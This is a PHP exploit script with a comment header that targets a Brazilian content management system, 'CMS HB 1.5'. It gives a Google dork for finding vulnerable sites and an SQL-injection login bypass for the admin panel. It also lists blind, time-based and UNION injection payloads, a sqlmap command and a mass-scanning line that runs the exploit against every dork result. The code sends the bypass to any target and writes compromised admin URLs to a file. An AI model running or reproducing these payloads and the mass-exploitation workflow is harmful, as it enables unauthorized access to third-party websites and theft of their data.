[EXPLOIT] XPL 0day CMS HB 1.5

<?php

/*
  [+] Discoverer Author: M3t4tr0n
  [+] FACEBOOK:    https://www.facebook.com/M3T4TR0N
  [+] EMAIL:       rammstain960@gmail.com
  [*] Thanks M3t4tr0n
  [*] Neither war between hackers, nor peace for the system.
  ------------------------------------------------------------------------------

  # SCRIPT by:     [ I N U R L  -  B R A S I L ] - [ By GoogleINURL ]
  # EXPLOIT NAME:  XPL 0day CMS HB 1.5 / INURL BRASIL
  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         inurlbr@gmail.com
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil
  ------------------------------------------------------------------------------

  # FAILURE REPORTED: 15/maio/2015

  # ADMINISTRATIVE ACCESS PANEL

  # Vendor:        http://www.hbwebecia.com.br/
  # CMS HB 1.5

  # Google Dork:   inurl:base.php?pagina

  # FILE VULN      /admin/logar.phpxx
  # POC:          (POST)http://{YOU_URL}/admin/logar.php?login='=' 'or'&senha='=' 'or'&Submit3=Entrar

  # FILE VULN      /base.php
  # POC:          (GET)http://{YOU_URL}/base.php?pagina=noticia&id=1 + (SQLI)

  # Type: boolean-based blind
  Title: AND boolean-based blind - WHERE or HAVING clause
  Payload: pagina=noticia&id=114' AND 1866=1866 AND 'qvCe'='qvCe

  # Type: AND/OR time-based blind
  Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
  Payload: pagina=noticia&id=114' AND (SELECT * FROM (SELECT(SLEEP(5)))MPQc) AND 'MJVC'='MJVC

  # Type: UNION query
  Title: Generic UNION query (NULL) - 7 columns
  Payload: pagina=noticia&id=114' UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716a786b71,0x664a78565a7276576e76,0x71787a7871),NULL,NULL--

   # USE SQLMAP:
  ./sqlmap.py -u 'http://{YOU_URL}/base.php?pagina=noticia&id=1'  //
  --dbs --random-agent --level 3 --risk 2  --proxy 'http://localhost:8118' //
  --dbms='MySQL' --threads 3 --time-sec 10 --identify-waf --text-only //
  --flush-session --batch

  # EXECUTE:       php xpl.php -t http://target.us

  # FILE_OUTPUT :  HB.txt

  # EXPLOIT MASS USE SCANNER INURLBR
  php inurlbr.php --dork 'inurl:base.php?pagina" ext:php' -s output.txt  --command-all 'php xpl.php -t _TARGET_'
  More details about inurlbr scanner: https://github.com/googleinurl/SCANNER-INURLBR
  ------------------------------------------------------------------------------


 */
error_reporting(1);
set_time_limit(0);
ini_set('display_errors', 1);
ini_set('max_execution_time', 0);
ini_set('allow_url_fopen', 1);
ob_implicit_flush(true);
ob_end_flush();

$op_ = getopt('f:t:', array('help::'));
echo "[+] [Exploit]: XPL 0day CMS HB 1.5 / INURL BRASIL \n";
$menu = "
    -t : SET TARGET.
    Execute:
                  php xpl.php -t target
                  php xpl.php -t target/path
\n";
echo isset($op_['help']) ? exit($menu) : NULL;
$params = array(
    'host' => not_isnull_empty($op_['t']) ? (strstr($op_['t'], 'http') ? $op_['t'] : "http://{$op_['t']}") : exit("\n[x] [ERRO] DEFINE TARGET!\n"),
    'line' => "-----------------------------------------------------------------------------------------------"
);

function __plus() {
    ob_flush();
    flush();
}

function not_isnull_empty($valor = NULL) {
    RETURN !is_null($valor) && !empty($valor) ? TRUE : FALSE;
}

function __request($params) {
    $objcurl = curl_init();
    curl_setopt($objcurl, CURLOPT_URL, "{$params['host']}/admin/logar.php");
    curl_setopt($objcurl, CURLOPT_USERAGENT, "Mozilla/" . rand(1, 50) . ".0 (compatible; MSIE " . rand(1, 50) . "." . rand(1, 50) . "1; Windows NT " . rand(1, 50) . ".0)");
    curl_setopt($objcurl, CURLOPT_POST, 1);
    curl_setopt($objcurl, CURLOPT_TIMEOUT, 5);
    curl_setopt($objcurl, CURLOPT_POSTFIELDS, array('login' => "'=' 'or'", 'senha' => "'=' 'or'", 'Submit3' => 'Entrar'));
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYPEER, 0);
    curl_setopt($objcurl, CURLOPT_SSL_VERIFYHOST, 0);
    curl_setopt($objcurl, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($objcurl, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($objcurl, CURLOPT_FRESH_CONNECT, 1);

    $info[0] = curl_exec($objcurl);
    $info[1] = curl_getinfo($objcurl);
    $info[2] = curl_error($objcurl);

    curl_close($objcurl) . __plus();
    unset($objcurl);

    return $info;
}

print "\n" . date("h:m:s") . " [+][XPL SEND POST]: array('login' => \"'=' 'or'\", 'senha' => \"'=' 'or'\", 'Submit3' => 'Entrar')";

$_h = __request($params);

if (strstr($_h[1]['redirect_url'], '/admin/index.php')) {

    print "\n" . date("h:m:s") . " [+][RETURN]:: ACCESS GRANTED!";
    print "\n" . date("h:m:s") . " [+][URL]:: {$params['host']}/admin/index.php [ OK ]";
    print "\n" . date("h:m:s") . " [+][LOGIN]:: '=' 'or'";
    print "\n" . date("h:m:s") . " [+][SENHA]:: '=' 'or' \n{$params['line']}\n";
    file_put_contents("HB.txt", "{$params['host']} -  LOGIN: '=' 'or' / SENHA: '=' 'or'\n\n", FILE_APPEND);
    __plus();
} else {

    print "\n" . date("h:m:s") . " [x][NOT VULN] " . (isset($_h[2]) && !empty($_h[2]) ? " - [DETAILS]::{$_h[2]}" : NULL) . "\n{$params['line']}\n\n";
}